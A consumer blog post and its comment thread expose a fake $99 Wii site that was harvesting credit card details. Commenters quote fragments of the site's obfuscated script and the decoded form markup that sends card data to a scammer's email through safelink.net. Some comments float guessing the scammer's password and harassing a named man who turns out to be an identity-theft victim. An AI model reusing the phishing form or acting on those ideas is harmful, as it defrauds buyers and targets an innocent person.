Quick, type in all of your credit card information before he runs out of inventory! Omgwtf $99 Wiis! The website, www.wiifor99.com—which is being advertised on Facebook, according to a reader—consists of the two screens shown above and that’s it. What a lazy con. Since the site no longer exists, here are two screencaps we took of it on Wednesday night. Index page. Order form.
Justin writes,
“While surfing Facebook today, I saw an ad for the Wii going for $99. It immediately set off my spider sense. The site was just registered to a guy out of Fayetteville, AR, but under a false name? The phone number listed is for a different Peter.
(Thanks to Justin!)
More From Consumerist
-
State DMVs Are Not Amused By Your Attempts To Get License Plates With Dirty Acronyms
-
Arkansas Court Tells Ticketmaster It Is Bound By Anti-Scalping Laws
-
Worst Company In America Round 1: Ticketmaster Vs. Equifax
-
Raiders Of The Lost Walmart In The Temple Of America Online
-
City Government Busts Old-Timey Soda Fountain For Selling Old-Timey Candy Cigarettes
@veritasvierge: Elderly people tend to be quite gullible, especially about things that weren’t around when they were young. I’d hate to hear that somebody’s grandma was phished because she wanted to buy the grandkids a present.
Ipsum Lorem is cornering the market on Wiis! Hurry folks, there’s only a couple left!
I order 4, but to make sure he wasn’t scamming me, I used 4 different credit cards from my mom’s wallet. I will trick him!!11
Did you ever consider he just stole the Wii’s and is looking to unload them quickly? That’s still a solid $99 profit per unit, after all. You people are too quick to assume something is a scam. You might just be getting stolen property!
@xamarshahx:
Well, guess that would make them a dumbass.
Anyone else notice that the payment is processed in Idaho? Safelink.net… I imagine a call to them might also do the trick. It’s too early now, I get a recorded message.
If you look at the page info there is an email for wehavewii@mail.com. I dunno if it is real but if anyone wants to guess some passwords….
the form is submitting to the email WeHaveWii@mail.com using a form hosted on safelink.net
[safelink.net]
The WHOIS data is likely fake.
He’s only a few blocks away from the University of Arkansas, but he doesn’t show up in the student directory. I feel sorry for him if someone has hijacked his identity for this deal.
The guy obviously knows SOMETHING about what he’s doing.
Look at the HTML code on the “buy” website.
{SCRIPT LANGUAGE=”JavaScript”>{!–
hp_ok=true;function hp_d02(s){if(!hp_ok)return;var o=”",ar=new Array(),os=”",ic=0,p=0;for(i=0;i80){ar[ic++]=os;os=”"}}o=ar.join(“”)+os;document.write(o)}//–>
(The brackets have been changed so you can see the text on Consumerist)
The entire thing is encrypted so you can’t see what the HTML code is. Is that code ripped from the Nintendo site as well, or did he do it on his own?
A quick google search of some of that code in the website shows references to a number of phishing websites and the following troubling phrase:
“At the time of investigation the URL opened an active fraudulent eBay site. Additionally, the site made repeated attempts to copy information from the Windows clipboard.“
@coold8: A lot of people are on facebook other than “dumb facebook teenagers”
How does that old saying go? “If it seems too good to be true it probably is”
God some people are walking around with rocks in their heads.
@Hambriq: Some browsers/tools let you see the “final” or “rendered” HTML so there is no hiding anything behind Javascript. Specifically Firefox with the Web Developer extension can do this. Just in case anyone is interested.
I’m going to buy a ton of these with the money I’ll be getting soon from my new Nigerian friend and sell them all for a profit!
The site’s down.
Someone needs to take the address and start sending all kinds of free magazine subscriptions and random dream catchers to this dude’s place.
http://www.absurdlycool.com
Looks like the form basically emails itself (with all of your CC info) to a wehavewii@mail.com.
This guy is a just a regular fella trying to a make a few dollars while providing Wii’s to teenages at a discounted price. Shame on all of you! I’m going to buy a few to support this guy. I wish all buisness people had a sence of helping out the little guy by pricing items cheeper than they cost to make, LIKE THIS HONORABLE SALESMAN! Screw you all, I’m gonna go play my WIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII’s.
@gyroball:
Don’t do that! Obviously the site was set up using the listed guys stolen credit card and sending this guy a bunch of crap is just going to make his day worse. The site is set up to forward the CC info to some far away place and not Arkansas.
@Craig: hey I hope that’s not the same as MY Nigerian friend…He told me I was special and wanted to share his money with me….I’m starting to feel like I may not be his only special friend
Gone
The requested resource
/
is no longer available on this server and there is no forwarding address. Please remove all references to this resource.
[www.wiifor99.com]
The main page is down, but the purchase page is still up and running.
As has been said a few times but probably needs repeating. The name on the website probably has absolutely no connection to the con artist who is actually running this scam. So harassing the fellow in Arkansas would only result in an innocent who’s already been take advantage of getting even more crap thrown at him..
[www.safelink.net]
Some of your information is getting redirected to safelink.net when you press the “Continue” button.
The plot thickens?
{form style=”margin: 0pt; padding: 0pt;” method=”post” action=”http://safelink.net/cgi-bin/MailForm2.exe”}
{input name=”File” value=”http://wiifor99.com/949xd90t34jtvjew4-fkh6-0dt76urf0943nglthhcders8bg3p45jccu7i7y5485df9-4-4igtjs8w4tps022s2.htm” type=”hidden”}{input name=”To” value=”WeHaveWii@mail.com” type=”hidden”{}input name=”Subject” value=”New Order” type=”hidden”}{input name=”SMTP” value=”mail.safelink.net” type=”hidden”}{input name=”From” value=”o@wii.com” type=”hidden}
From the decrypted version of the source code of the website. (The < brackets have been replaced by { brackets so you can read it on Consumerist.)
So it looks like he is using a mailing program based on SafeLink.net, and the information is being harvested at WeHaveWii@mail.com.
Nice.
I copied and pasted the code from the website to my own, and changed the e-mail address and this is the e-mail that was delivered promptly to my inbox upon completing the form.
“Type: American Express
Number: 12345678910
Month: 0
Year: 0
CVV2:
Name: John
LName: Doe
Address: 123 Main St
Address2:
City: Anytown
State: MA
Zip: 12345
Phone2: 123
Phone1: 4567890
Email: j@b.com
Pass:
Pass2:
cppcontinuebutton.x: 61
cppcontinuebutton.y: 7″
So if anyone was curious as to whether or not this is a scam…. It is.
God are you a bunch of snitches. If someone wants to rip off dumb assess you don’t have to hate on the guy and ruin his scam.
Earthlink doesn’t do jack squat about fraud on their servers.
@rabiddachshund: lol i did the same thing
ASSCORE has been snitched on to the proper authorities to ruin his scam and to just be generally hated on.
I’m sorry, bur scamming people out of there money is a horrible thing to do. It doesn’t matter that to you and I this is an obvious phishing scam, those who are more naive don’t deserve
still don’t deserve to lose their money…
I work for a clec and manage our abuse department. I contacted Earthlinks abuse manager last night on his cell phone and informed him of the problem.
This is the email I received back from them last night, if anyone sees this guy popping up elsewhere on Earthlink their case is AB0000000993187 for this gentleman.
Hello there,
Thank you for contacting Earthlink. This issue has been resolved as we have dealt with the user in question accordingly. You shouldn’t expect any more trouble from this user. If you see any more evidence of this type of activity from an Earthlink user, please make us aware of this.
Regards,
Earthlink Network Abuse
abuse@abuse.earthlink.net
This is from digg a few minutes ago from someone called “victimpete”
I’m Pete Rankin, and I did just speak to the bustown. For all you guys out there advocating punching me in the face, here’s what my day is going to be like tomorrow: 1. Contact the FTC and report ID theft, 2. Contact the fucking morons at Earthlink, again. Hopefully get someone from this continent this time. 3. File police report, 4. File a fraud alert with experian, 5. Change my bank account, credit card, phone number, 6. Worry all day about the safety of my wife and 3 year old son, 7. Try vainly to get the all the geniuses who are smart enough to link to a satellite image of my house ( but somehow too fucking stupid to think the guy whose house they are providing a link to might not be the guy getting all those valuable cc numbers) to remove my personal information from an ever increasing number of forums and blog. Some of you guys are true intellectual titans. So have a great Friday, mines gonna be just super.
@erica.blog: Uhm yeah they do. I emailed them and the site was taken down within 12 hours. You just have to report it to the right people. The email address is usually “abuse@domain.com”.
Wait… is there an SD card somewhere in my Wii?